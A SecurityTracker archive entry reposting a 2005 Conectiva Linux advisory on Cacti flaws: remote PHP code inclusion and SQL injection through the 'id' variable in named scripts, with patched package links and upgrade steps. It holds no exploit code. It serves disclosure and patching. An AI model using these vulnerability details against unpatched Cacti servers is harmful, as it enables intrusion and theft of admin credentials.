SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Generic)  >   Cacti Vendors:   RaXnet
(Conectiva Issues Fix) Cacti Input Validation Holes Let Remote Users Inject SQL Commands and Execute Arbitrary Commands
SecurityTracker Alert ID:  1014435
SecurityTracker URL:  http://securitytracker.com/id/1014435
CVE Reference:   CVE-2005-1524, CVE-2005-1525, CVE-2005-1526   (Links to External Site)
Date:  Jul 9 2005
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): prior to 0.8.6e
Description:   Some input validation vulnerabilities were reported in Cacti. A remote user can inject SQL commands. A remote user can execute arbitrary commands on the target system.

The software does not properly validate user-supplied input. A remote user can supply specially crafted parameter values to execute SQL commands on the underlying database.

If the 'register_globals' configuration is set to 'on' in the target user's 'php.ini' configuration file, then a remote user can supply a specially crafted URL to overwrite certain PHP variables and cause the system to include and execute arbitrary PHP code. The PHP code, including operating system commands, will run with the privileges of the target web service.

The vendor credits iDEFENSE with reporting these vulnerabilities.
Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote user can execute SQL commands on the underlying database.
Solution:   Conectiva has released a fix.

ftp://atualizacoes.conectiva.com.br/10/SRPMS/cacti-0.8.6f-56117U10_4cl.src.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cacti-0.8.6f-56117U10_4cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/9/SRPMS/cacti-0.8.6f-22563U90_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/cacti-0.8.6f-22563U90_3cl.noarch.rpm
Vendor URL:  www.raxnet.net/products/cacti/ (Links to External Site)
Cause:   Input validation error
Underlying OS:   Linux (Conectiva)

Message History:   This archive entry is a follow-up to the message listed below.
Jun 21 2005 Cacti Input Validation Holes Let Remote Users Inject SQL Commands and Execute Arbitrary Commands


 Source Message Contents
Date:  Thu, 7 Jul 2005 10:20:20 -0300
Subject:  [Conectiva-updates] [CLA-2005:978] Conectiva Security Announcement


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
CONECTIVA LINUX SECURITY ANNOUNCEMENT 
- --------------------------------------------------------------------------

PACKAGE   : cacti
SUMMARY   : Security fixes for Cacti
DATE      : 2005-07-07 10:20:00
ID        : CLA-2005:978
RELEVANT
RELEASES  : 9, 10

- -------------------------------------------------------------------------

DESCRIPTION
 Cacti[1] is a is a complete data graphing solution that provides a
 fast poller, advanced graph templating, multiple data acquisition
 methods and user management features out of the box.
 
 This announcement fixes the following security issues with Cacti:
 
 1.CAN-2005-1524[2,3]
   Cacti contains an input validation error in the
 top_graph_header.php script that allows an attacker to include
 arbitrary PHP code from remote sites. This in effect allows arbitrary
 code execution with the privileges of the web server.
 
 2.CAN-2005-1525[4,5]
   Cacti contains an input validation error in the config_settings.php
 script which allows an attacker to execute arbitrary SQL queries.
 This in effect allows an attacker to recover the administrative
 password for the Cacti installation. Various scripts are vulnerable
 to SQL injection using the 'id' variable.
 
 3.CAN-2005-1526[6,7]
   Cacti contains an input validation error in the config_settings.php
 script which allows an attacker to include arbitrary PHP code from
 remote sites. This in effect allows arbitrary code execution with the
 privileges of the web server.
 
 
 IMPORTANT
 For Conectiva Linux 10:
 The cacti cron command must be changed from
 '/srv/www/default/html/cacti/cmd.php' to
 '/srv/www/default/html/cacti/poller.php' in order to get the new
 cacti properly working.
 
 For Conectiva Linux 9:
 The database must be converted in order to make cacti work again and
 also apply the above cron change.
 
 For aditional information on upgrading cacti please, refer to the
 file /srv/www/default/html/cacti/docs/INSTALL included in the
 package.


SOLUTION
 It is recommended that all Cacti users upgrade their packages.
 
 
 REFERENCES
 1.http://www.cacti.net
 2.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1524
 3.http://www.idefense.com/application/poi/display?id=265&type=vulnerabilities&flashstatus=true
 4.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1525
 5.http://www.idefense.com/application/poi/display?id=267&type=vulnerabilities&flashstatus=true
 6.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1526
 7.http://www.idefense.com/application/poi/display?id=266&type=vulnerabilities&flashstatus=true


UPDATED PACKAGES
ftp://atualizacoes.conectiva.com.br/10/SRPMS/cacti-0.8.6f-56117U10_4cl.src.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cacti-0.8.6f-56117U10_4cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/9/SRPMS/cacti-0.8.6f-22563U90_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/cacti-0.8.6f-22563U90_3cl.noarch.rpm


ADDITIONAL INSTRUCTIONS
 The apt tool can be used to perform RPM packages upgrades:

 - run:                 apt-get update
 - after that, execute: apt-get upgrade

 Detailed instructions regarding the use of apt and upgrade examples 
 can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en

- -------------------------------------------------------------------------
All packages are signed with Conectiva's GPG key. The key and instructions
on how to import it can be found at 
http://distro.conectiva.com.br/seguranca/chave/?idioma=en
Instructions on how to check the signatures of the RPM packages can be
found at http://distro.conectiva.com.br/seguranca/politica/?idioma=en

- -------------------------------------------------------------------------
All our advisories and generic update instructions can be viewed at
http://distro.conectiva.com.br/atualizacoes/?idioma=en

- -------------------------------------------------------------------------
Copyright (c) 2004 Conectiva Inc.
http://www.conectiva.com

- -------------------------------------------------------------------------
subscribe: conectiva-updates-subscribe@papaleguas.conectiva.com.br
unsubscribe: conectiva-updates-unsubscribe@papaleguas.conectiva.com.br
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFCzSwT42jd0JmAcZARAhx+AKCXmONDcA8mgsMnlHFUwse+D2bXFACgwhzJ
BYGJDQhaXGNPpp6Xv7+0ndU=
=Ht75
-----END PGP SIGNATURE-----

______________________________________________________________________
subscribe: conectiva-updates-subscribe@papaleguas.conectiva.com.br
unsubscribe: conectiva-updates-unsubscribe@papaleguas.conectiva.com.br


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC